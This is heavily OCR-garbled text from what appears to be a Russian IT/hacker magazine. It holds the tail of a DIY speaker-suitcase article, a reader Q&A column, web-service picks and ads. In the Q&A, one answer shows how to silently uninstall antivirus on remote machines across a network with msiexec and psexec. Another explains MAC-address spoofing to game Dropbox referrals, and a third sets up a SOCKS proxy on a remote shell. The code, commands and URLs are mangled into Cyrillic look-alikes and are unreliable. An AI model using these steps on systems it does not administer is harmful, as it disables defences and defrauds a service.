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Плата тр3 из усилителя 


Схема питания 


4. Отполировать или покрасить уголки. 

5. Собрать все обратно. 

Размер чемодана выбирай исключительно исходя из своих сил, 
крайне необходимых предметов найдется даже для самого боль- 
шого, но чтобы таскать его за собой потребуется недюжинная 
выдержка. Теперь чемодан подготовлен, и осталось определиться 
с набором гаджетов для волшебной коробочки. 

Этот бело-красный чемоданчик довольно небольшой, поэтому и 
задач на него возлагается минимум — играть музыку, светиться в 
темноте и заряжать телефончики. На большее там места не най- 
дется (кроме небольшой фляжки для минеральной воды). 
Электрика простая — пара крокодильчиков от аккумулятора ведут 
к двум большим красным кнопкам, одна из которых включает 

все внутреннее оборудование (у усилка и света есть еще и свои 
выключатели), а другая — внешнюю розетку. Подключаться к 
аккуму именно крокодильчиками удобно потому, что это позволит 
легко перекинуть питание на другой источник. 

Для фиксации гаджетов внутри чемодана я использовал клей из 
термоклеевого пистолета, который можно купить за пару сотен 
рублей [плюс десяток стержней за 50 рублей]. Усилитель и акку- 
мулятор укреплены на деревянные рейки, которые держатся на 
корпусе чемодана также при помощи термоклея. 

Этот красный чемоданчик — лишь минимальный набор того, что 
стоит брать с собой на природу. Большинство девайсов пригодят- 
ся тебе не только за городом, но и в любой другой день в машине 
и дома, так что потраченные деньги не будут выброшены. Уверен, 
ты придумаешь еще тысячу вариантов дополнить этот комплект, 
главное, выезжая на отдых, не забудь расслабиться и на самом 
деле хорошенько отдохнуть! 5= 
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УМТ5 


Степан «5{ер» Ильин (мег. сот/{ераНп) 


Есть вопросы — присылай 
на {аа@геа|.хаКер.ги 


О:Какой инструмент ты можешь посо- 
ветовать, чтобы найти на сайте мед- 
ленные страницы, чтобы впоследствии 
оптимизировать их? 

А: Наверное, каждый веб-мастер знаето 
таком инструменте для аналитики, как боод([е 
Апайс$ Мл. дооще.согп/апа\ с). С не- 
давнего времени сервис обзавелся новым 
интерфейсом [он постепенно становится 
доступным всем пользователям) и некоторы- 
ми новыми фичами. Одна из них занимается 
как разтем, что измеряет время загрузки 
отдельных страниц сайта. По умолчанию, 
правда, такая возможность отключена. Чтобы 
включить бенмарк необходимо добавить 
одну строчку в скрипт СА [тот /5-код, который 
вставляется в каждую страницу веб-проекта 
и необходим для сбора и отправки данных 
Сооб(е`у}, аименно обращения кфункции 
_{гаскРаде!оаЧТите(}, который должен про- 
исходить после вызова _гаскРадеме\): 


// Вариант для асинхронного кода СА: 
_ваа.рч$й(['_+гаскКРавеу1ем' |); 
_ваа.рч$й(['_гаскКРаве!оааТ1те' ]); 
// Вариант для стандартного кода СА: 
равеТгаскКег._1гасКРавеу1ем(); 
равеТгаскКег._1гасКкРаве!оааТ1те(); 


После этого данные о времени загрузки 
страницы ты сможешь найти в отчете «Со- 
держание -> Скорость загрузки сайта». В отчет 
будут включены все страницы ресурса, отсо- 
ртированные в списке по времени загрузки в 
секундах. 


> 14.0 


О: Каким образом можно сделать пол- 
ный бэкап профайла отдельного поль- 
зователя М/пао\$ и всех пользователей 
сразу? Чтобы без проблем перенести 
профиль в другую систему? 

А: Можно было бы объяснить, как это сделать 
вручную, но лучше всего с задачей справятся 
специализированные утилиты вроде ВасКир 
(АЦиу [соде.дооб(е.сот/р/баскир-иШу-4) и 
Оа{аСгаЬ ($Кез.доое.согп/а/обхсогпрацу. 
сопп/оо$В-Н/мЬб-рго|ес{5/Ча{адгаь)}, ко- 
торые полностью автоматизируют процесс. 


Вторая изутилит создает резервную копию 
выбранного профиля [при желании можно 
сделать бэкап всех профайлов сразу], атакже 
любых других выбранных папок и оформля- 
етрезервную копию в виде исполняемого 
файла. Соответственно, для переноса профи- 
лей в другую систему, в том числе недавно 
установленную, необходимо лишь запустить 
этот ехе-шник. 


О: Некоторые компании для регистра- 
ции по старинке требуют отправить 
факсом какие-то документы. К счастью, 
смог сделать это из офиса, правда, при- 
шлось отключать на телефоне выход на 
международную связь. Как бы обойтись 
без этого геморроя? 

А: Знакомая проблема. Ведь даже для полу- 
чения аккаунта разработчика Арр(е, придется 
воспользоваться факсом (М/ТЕ?!). Проще 
всего «отправить бумажку» через специ- 
альный сервис вроде млллм/. гоуах.сого/гее. 


Совершенно бесплатно, замечу. 


О: Посоветуй $5ОСК$5-прокси, который 
можно установить наудаленном Ипих- 
шелле. 

А: Ты, возможно, удивишься, но в большин- 
стве случаев поднять на Чпих-хосте сокс 
можно всего одной командой: 


<$5П -М -0 0.0.0.0:1080 Тоса1По$+ 


Таким образом, мы включаем динамическую 
переадресацию портов (флаг«-0»)} с 1080 пор- 
та и взаимодействие с клиентами по протоко- 
лам $0СК$4 и 50СК55 [то естьточнотак же, 
какилюбой другой 5ОСК55-прокси). Опция 
«-М№» указывает, что процессу необходимо ра- 
ботать в '@(е-режиме без запуска каких-либо 
команд на (осаПо$Ге. Можно также запустить 
55П в фоновом режиме, добавив при запуске 
ключ «-Ё»›. Важно, что для выполнения коман- 
ды тебе не нужны рутовые привилегии. Но 
они понадобятся, если ты захочешь сделать 
контроль доступа при помощи р{аЩее: 


1рфаб1е$ -А ТМРОТ --$гс 1.2.3.4 -р ср 

- -арог{ 19080 -) АССЕРТ 

1рфаб1е$ -А ТМРОТ -р ср --арог* 1080 -) 
ВЕЗЕСТ 


С помощью этих команд мы разрешаем под- 
ключения с [Р-шника 1.2.3.4 изапрещаем 
любые другие [для 1080 порта]. Но если очень 
хочется отсечь левые подключения, которые 
обязательно будут, а рутовых прав нет, то 
можно воспользоваться довольной простой 
ргоху-оберткой, написанной на Рег{е, — ТСР 
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Устанавливаем политику для запу- 
ска приложения 


ргоху (9 НиБ.сого/ркгиппип/рег(-ср-ргоху). В 
сценарии явным образом прописывается спи- 
сок допустимых для подключения [Р-адресов 
(переменная @аЦоме4 р}. ТСР ргоху будет 
стартовать на указанном порту и переадресо- 
вывать на наш 5ОСИК$-сервер толькоте запро- 
сы, которые разрешены. Сам демон $$Н при 
этом нужно запустить немного по-другому: 


$$ -М -0 55555 ]1оса]1Ио$* 


При такой конфигурации никто не сможет под- 
ключиться к5ОСК5 извне, кроме приложений, 
запущенных на (оса[По$Ге. 


О: Подскажи, как правильно (без 
лишних костылей и софта) огра- 
ничить список программ, кото- 

рые может запускать \Мт4о\м/$- 
пользователь? 

А: Задача «наура» решается с помощью 
стандартного механизма \\Лп4о\/, который 
называется «Политика ограниченного ис- 
пользования программ» [5КР). Если быть 
точным, то через редактор групповой политики 
(СРО). Наша задача — запретить пользователю 
запусклюбых приложений, кроме нескольких 
разрешенных (ты их определяешь сам] итех, 
которые необходимы ему для выполнения 
входа в систему. Так, чтобы юзер могпросто 
залогиниться в систему, ему обязательно нужно 
предоставить доступ к следующим системным 
приложениям: 


: \\1паом$ \ехрТогег.ехе 

: \И1паом$ \$у$тет32\с$г$$5.ехе 

: \\И1паом$ \5у$ет32\аит.ехе 

: \И1паом$ \5у$ет32\гас11р.ехе 

: \И1паом$ \5уз$фет32\ТФа$КНо${.ехе 
: \\И1паом$ \5у$тет32\Т$Тпете.ехе 
: \И1паом$ \5узет32\изег1п1{.ехе 


дом оооо 


Это обязательный список — без этих при- 
ложений пользователь даже не сможет зайти 
в систему. Теперь пошагово пройдем по про- 
цессу создания нужной политики: 
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$ОШебру — наиболее продвинутый 
инструмент для работы с $5ОШе 


1. Запускаем консольуправления («Пуск = 
Выполнить» -» пипс). 

2. Выбираем в меню «Файл -» Добавить или 
удалить оснастку». 

3. Кликаем на «Редактор объектов групповой 
политики» [СРО). 

4. Жмем «Добавить». 

5. Кликаем «Обзор», указываем пользователя, 
который будет добавлен в СРО. 

6. Кликаем «Готово» и потом «ОК». Теперь 

в консоли управления ты видишь дерево с 
корневым элементом «Политика <имя поль- 
зователя». 

7. Переходим в «Конфигурация пользовате- 
ля > Конфигурация \МЛпдом/$ -> Параметры 
безопасности» и кликаем правой кнопкой 
по «Политики ограниченного использо- 
вания программ» и выбираем «Создать 
политику ограниченного использования 
программ». 

8. В дереве появятся два новых элемента. 
Кликаем на «Уровни безопасности». 

9. Дважды кликаем по элементу «Запрещено» 
и устанавливаем этот уровень безопасности 
по умолчанию. С этого момента пользователь 
не сможет запускать никакие приложения, 
кроме разрешенных. 

10. Переходим в раздел «Дополнительные 
правила». Удаляем отсюда мусор, который 
создала система (элементы, начинающиеся с 
«%НКЕУ 1ОСАЁ_МАСНИМЕ\...»). 

11. Остается добавить правила, разрешающие 
запуск необходимых для пользователя прило- 
жений и тех элементов, которые я перечислил 
выше, и необходимые для нормальной работы 
юзера в системе. 

Делается это отдельно для каждого бинарника 
через контекстное меню «Создать правило 
для хэша», где надо выбрать нужный испол- 
няемый файл и поменять уровень безопасно- 
сти для него на «Неограниченный». 


О: Какую базу данных посоветуешь для 
простых проектов? 

А: Если нужно что-то очень простое, то мой 
совет — 591 е [млллм. а Ше.ога), которая 

при всей простоте использования является 
частью многих серьезных проектов. 

Многие программы поддерживают 591 {е в 
качестве формата хранения данных [особенно 
в Мас О$ и!РБопе 05, Апдго!4). 

Базой данных 5 [Ще удобно управлять 
через консольную утилиту $9Ще3 или 


Дампим адресное пространство 
процесса с помощью РМО 


СИ -приложение вроде 59 [Ще Вгом/ег 
(заеБго\изег. зоигсеогае. пе), 5 \ебру 
(ммм уипаа.9е/дефвИдоки. рЮр/ргофиси/ 
5аЩезру/таех) и Се Мападег (а99опе. 
ппо7(а.ога/ги/Ягеюх/аЧ4оп/аЩе-пападег). 
Чтобы глубже вникнуть в процессы, происхо- 
дящие внутри 51 Ще, рекомендую посмотреть 
видеолекции отее создателя Ричарда Хиппа 
[ы.у/ СКА). 


О: Какой самый простой способ захо- 
стить файлы судаленной машины? 

А: Недавно открыл для себя один замечатель- 
ный хак, представляющий собой всего одну 
команду: 


$ руЕПоп -т $1тр1еНТТР5егуег 


Эта команда поднимаетна 8000 порту [по 
умолчанию] полноценный веб-серверс 
контентом текущей директории [т.е.той, от- 
куда она была выполнена]. Демон стартует 
на всех интерфейсах одновременно [адрес 
0.0.0.0). Если в папке будет 'пдех.Ригп, то он 
соответствующим образом будет обработан 
при обращении. Если же его не окажется, то 
ты увидишь листингтекущей директории. 
Оченьудобно. Все это хозяйство работает 
потому, что в стандартной поставке Ру{Поп 
есть модуль 5ипреНТТР5$егуег. А поскольку 
Ру{оп сейчас есть в поставке большин- 
ства ипих-дистрибутивов, то хак с большой 
вероятностью заработает практически везде. 
Ничего не мешает провернутьто же самоеи 
под виндой, если в ней установлен пайтон. 


О:Как незаметно удалить антивирус с 
удаленной машины? 

А: Хочу рассказать об одном довольно за- 
бавном способе, в который я долго не мог 
поверить, когда мне его показали. Его мне 
продемонстрировал один знакомый адми- 
нистратор, которому необходимо было сразу 
со всех машин в локальной сети удалить 
корпоративную версию 5утаес Ап мгис. 
Поскольку речь шла о локалке крупного 
инвестиционного банка, то об остановке 
работы пользователей не могло идти и речи 
[а трудятся парни и днем, и ночью). Важно 
было удалить антивирус [чтобы установить 
более новый продукт оттой же компании), 
но так, чтобы никто из пользователей даже 
не заметил осуществляемых действий. 
Причем обязательно было обойтись без 
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перезагрузки. Как сделать это на 300 
компьютерах одновременно? Недолго 
думая, приятель посмотрел, как антивирус 
предлагает удалить его вручную. Для этого 

в ветке реестра НКЕУ _ГОСАЕ _МАСНТМЕ\ 
$ОЕТМАВЕ\МТСВО$ОЕТ\ИТМООи$ \ СУВКЕМТ 
УЕВЗТОМ\ УМТМ$ТАЕЕ он нашел запись, 
которая касалась 5утатес АпИмгие. Его 
идентификатор был {ВА4В7101-898Е- 
4306-АЕЗ7-8ВА7А596ЕОЕО}. В параметре 
Чпт${а($ {тд явно указывалось, что 
деинсталляция осуществляется через 
стандартную службу Мы!Ехес.ехе. Уже просто 
скопировав значение этого параметра в 
командную строку, можно было запустить 
процесс удаления программы с компьютера. 
Но нам-то нужно «тихое» удаление. Оказа- 
лось, что если добавить несколько ключей 
Мы!Ехес.ехе, то провести операцию можно 
вообще без всякого шума: 


М$1Ехес.ехе /погезфаг* /а/х{ВА4В7101- 
898Е-4306-АЕЗ7-8ВА7А5Э6ЕОЕВ } 
КЕМО\/Е=АЁ Е 


А имея права администратора домена, та же 
самая команда легко отдается на выполнение 
всем компьютерам в локальной сети: 


рзехес \\сотрифег_пате М1Ехес.ехе / 
погефаг{ /9/х{ВА4В7101-898Е-4306- 
АЕЗ7-8ВА7А5Э6ЕОЕО} ВЕМОМЕ=АЕЕ 


Зная, сколько сил антивирусные вендоры 
тратят на различные защитные механизмы, 
сложно поверить, что все может быть выпол- 
нено настолько просто. 


О: Как прокачать свой аккаунт на 
ОгорБох, используя реферальную 
систему? Одних только левых етай’ов 
не хватает: программа каким-то 
образом определяет уникальность 
системы. 

А: Если говорить начистоту, то мойтебе совет. 
Если тебе действительно нужны дополни- 
тельные гигабайты для Огорбох-ящика, то не 
обломайся: купи премиальный аккаунт. За 
счет этого сервис может позволить миллионам 
пользователей пользоваться его услугами 
совершенно бесплатно. Но если по сути во- 
проса, то уникальность пользователя ОгорБох 
определяется по МАС-адресу. Так что для 
каждого нового реферала, который будет при- 
бавлять 250 Мб кобъему контейнера Огоррох, 
нужно: 

1. Зарегистрироваться суникальным ета ом. 
2. Войти в систему, используя такую регистра- 
ЦИЮ. 

Если под Чпих’ом Мас-адрес для сетевого 
адаптера меняется через Исопйд, то под вин- 
дой тебе понадобится специальная утилита 
Тесбп\цигт МАС Адагез$ СВапдегу5 Ке[еазе 3 
[мммм(есВпИигт.сого). К слову, энтузиасты уже 
успели написать скрипт, который автомати- 
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зирует процесс прокачки профиля Огорбох 
(Рабгарабгги/6©9$/5егусе$/120526). 


О: Вот задачка, как бы тыее решил? В 
]ауа$спртесть некоторые данные, наих 
основе необходимо сгенерировать но- 
вый кусок НТМЕ-страницы (по шаблону) 
ивставить в ООМ. Как это лучше всего 
реализовать? 

А: Главный вопрос: какхранить шаблон и 

как наиболее удачно вставить в этот шаблон 
данные? Решение этой задачки, честно скажу, 
я открыл для себя из блога Степана Резника 
(вгехпкоу. 6 ©95ро*.сого). А он, всвою очередь, 
позаимствовал его излекций Дугласа Крок- 
форда. Идея втом, чтобы добавить в прототипы 
объекта 5\гтд метод зирр(ап\, который в строке 
ищетвыражения, заключенные в фигурные 
скобки {}. Каждое найденное выражение ис- 
пользуется как ключ к переданному объекту, 

и, если по этому ключу лежит строковое или 
числовое значение, то выражение в фигурных 
скобках заменяется этим значением. 


5Ег1п8 .ргофофуре. зирр1Тап{ = 
ФипсЕ1топ(о) { 
гефигп {615.гер1асе(/{([^{}]*)}/=, 
ФипсЕ1топ(а, Ь) { 
маг г = о[6]; 
гефиги фурео+ г === '5%г1пр' || 
фуреот г === ‘питбег' ? г: а; 


р. 
р. 


Как это работает. Для примера берем следую- 
щие данные: 


\уаг дажа = { 
ив: ‘вез Е/”. 
ЕПитб_5гс: 'Же$ф.21+', 
ЕПитбЬ_мтаер: 69, 
Пит _Пе158т: 30, 
сар1оп: 'Трам-парам! ' 


т. 


И используя функцию зирр/(ат\, вставляем ихв 


заранее подготовленный шаблон: 


\аг фетр1афе = '<41\у с1а$5="ргеу1ем" > 
<р с1а$$="1тазе">‹а Пге+="{иг1}"><1т8 
5гс="{ЕВитб_$гс}" мтаеП=" {Е ПимЬ _ 
итаеи}" пе1ёй*="{ЕПитб_Пе18й*}"/></ 
а></р><р с1а$5="сар1оп" >{сар{1оп}</ 
р></а1м>'; 

\уаг гези1* = фетр1а*е. зирр1ап* (ааа); 


Это определенно наиболее изящное реше- 
ние, в отличие отварианта, когда приходится 
вручную создавать элементы (сгеае \еппепй 
и аппендить их (аррепаС Ва] в О0М. 


О: Можно ли, не залезая в дебри АР!- 
вызовов, отслеживать изменения в 
файловой системе и в зависимости 


отэтого выполнять определенные 
действия? 

А: Конечно, можно, и особенно изящно, если 
в системе есть РомегВе[ (по умолчанию 
входитв М/пао\мие 7 и МИпдом/$ бегуег 2008 62]. 
Делается этотак: 

1. Создаем новый объект 5у%ет.|0.ЕЦе5у- 
$егп\\/а(сВеги задаем для него несколько 
настроек: 


$маЕспег = М№ем-ОБуесЕ 5уз{ет. 
ТО.Е[11е5у${ептмафспег 

фиажспег.РаЕН = $5еагсНРа*И 
фиа+спег.Тпс1и4е$иБа1гес*ог1е$ = $+гие 
фиа+спег.Епаб1еКа1$1п=Е\уеп*$ = $Егие 


Параметр .Ра{И задает путь, за которым не- 
обходимо выполнять мониторинг. Атрибут 
псае5ибатгецоне$ включает обработку 
всех поддиректорий. 

2. Теперь определим несколько событий, 
которые будут отслеживаться, когда Фуиа{сВег 
заметил изменения в файловой системе. Про- 
стой обработчик при обнаружении изменения 
файлов будет выглядетьтак: 


$ спапвеад = Ве21$ег-ОБ]есЕЕмеп* 
фиаЕспег "СВапзед" -АсЕ1оп { 

иг1%е-Но$5* "СПВапзеа: $ ($еуеп*Агв$. 
Еи11Рай)"} 


Внутри такого обработчика можно написать 
произвольный код, выполняющийся при на- 
ступлении события. В данном случае мы про- 
сто выводим сообщение об изменении файла 
на экран, указав его путь. 

3. Установленные события будут отлавливать- 
ся дотех пор, пока не завершится РомиегзВеЦ- 
сессия, но их можно «выгрузить» принуди- 
тельно: 


Ипге81 $+ег-Е\уеп* $сВапвеа. Та 


Кстати, даже если ты ничего не знаешь об этой 
Ро\ммегЪВеЦ, то разобраться с ней не составит 
большого труда. Рекомендую Ромегб И! (млллм. 
ро\миегаш.ога] в качестве среды разработки, 
чтобы скрипты писать стало еще веселее. 


О: Каким образом можно сделать пол- 
ный дамп памяти приложения? Только 
пойми меня правильно: не РЕ-дамп, 
аименно дамп всего адресного про- 
странства приложения? Есть несколько 
процессов, в которых крайне интересно 
покопаться :). 

А: Подходящихутилит немного. Одна из них 
— Ргосез$ Метогу Оитрег (е\паег$.сопл/ 
{00[5//Ргосез<Меппогу/игпрег.рВр}, которая 
в кругу компьютерных криминалистов чаще 
называется РМО. Это 6 -приложение, в 
котором ты можешь выбрать нужный процесс 
и получить для него ОитреаРгосе$$.агпр, в 
котором будет помещен дамп его адресного 
пространства. == 
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Для максимально 
быстрого и удобного 
расшаривания файлов 
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© Давно искал для себя удобный веб-сервис, который работал бы в 
связке со специальным приложением и максимально быстро позволял 


расшарить любой файлв Сети. В привычном ОгорБох'е для такой опера- 


ции приходилось перемещать файл в папку РибИс и выполнять другие 
нежелательные телодвижения. Сервис же пт.и$ оказался именнотем, 
чем нужно. Его клиентская часть [доступна для \\пдом/, Мас, Мпих] 
тихо сидит втрее и позволяет в момент залить файл в облако самым 
обыкновенным @гад'п’агор’ом, получив в буфере обмена линк, которым 
ты можешь поделиться с друзьями. Что важно — клиентская часть до- 
ступна и для мобильных платформ (Апаго!а, 10$, \/Р7), поэтомуя вовсю 
юзаю «минус» и со смартфона. 
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Для изучения сетевых 
протоколов 


и Рирын т 


РАСЕ2К55 
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© Привыкнув кВ $5-подпискам, через которые получаешь обновления 
для сотен сайтов, начинаешь очень сильно расстраиваться, когдау 
какого-то ресурса не оказывается К55-фида. Но не заходить же натакие 
нерадивые сайты вручную, в конце концов? Раньше в бооч(е Кеадег 
[онлайн Р55-агрегатор от боод(е] была встроенная функция, которая 
отслеживала обновления нужных страниц и новые данные оформля- 
лаввиде К55-фида. Таким образом, все автоматически попадало в 
К$$-агрегатор, а заходить на сайт вручную уже не было необходимости. 
Позже разработчики отключили такую возможность и предложили 
использовать специальные сервисы вроде раде2г$$. Собственно, этим 
советом я и пользуюсь до сих пор. 


Для создания 
собственного 
рукописного шрифта 


МЪЧАЧАМО 


мзиайапа.пе 


© Каждый знает зачем нужны протоколы вроде АБР, 0М$, ОНСР, |СМР 
ит.п. Но когда необходимо разобраться в деталях, как они работают, и 


представлять структуру пакетов, приходится потратить немало времени, 


чтобы вникнуть в КЕС и прочую сухую документацию. Ценнейшим по- 
мощником в изучении материала может стать сервис \!5цаЦапа. Здесь 
собрано огромное количество роликов с визуализацией работы разных 
сетевых протоколов. Все в очень наглядной форме. Приводится объяс- 
нение работы протокола, атакже пошаговая визуализация пакетов: что, 
откуда и куда передается, какие флаги меняются, что и в какой момент 
происходит. Рекомендую также аналогичный проект: Б\.|У/)азрег Веге. 


›? 144 


РЕОТНАМОМЛИМС 


рИотапа\м/Ипа.согп 


© Довольно любопытный и занятный сервис, с помощью которого ты 
можешь создать шрифт на основе своего почерка. После регистра- 
ции пользователю предлагается распечатать специальный листАД, 

в котором необходимо вписать каждую букву алфавита от руки. Далее 
этот лист необходимо «показать» сайту через веб-камеру — сервис 
произведет распознавание отдельных символов и предложит откор- 
ректировать начертание букв. Как только процедура будет закончена, 
РЦо{Напд\м/ипа соберет для тебя шрифт. Единственным минусом 
проекта, который никак не исправят разработчики, является жесткая 
привязанность к латинскому алфавиту. 
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Реклама 
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БЛАГОДАРЯ ЖУРНАЛУ «РС ИГРЫ», ВЫ ВСЕГДА СМОЖЕТЕ ПОСОВЕТОВАТЬ ДРУЗЬЯМ... 


ЛУЧШИЕ НОВИНКИ САМЫЕ ОЖИДАЕМЫЕ ИГРЫ ОПТИМАЛЬНЫЕ КОМПЛЕКТУЮЩИЕ ДЛЯ ПК 


зсё серьёзно 


Новый процессор е® Соге"М 15... 
Тонкий дюралюминиевый корпус... 
Революционный экран эирегВиа Риз *... 
ничего лишнего. 


Ноутбук Затзипа серии 9. Возможно, лучший ноутбук. Умный. 
вы ты у у И это видно. 
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* Супер Брайт Плюс Умная производительность с ускорением. И это видно. 


Единая служба поддержки: 8-800-555-55-55 (звонок по России бесплатный). м/м\м/.затзипа.сот. Товар сертифицирован. Реклама. 


е!, логотип {1 ще! пзае, ие! Соге и Соге пзае являются товарными знаками корпорации ие на территории США 


и других стран. Для получения дополнительной информации о рейтинге процессоров пе! посетите сайт млм\м.ище!.ги/гайпо. 


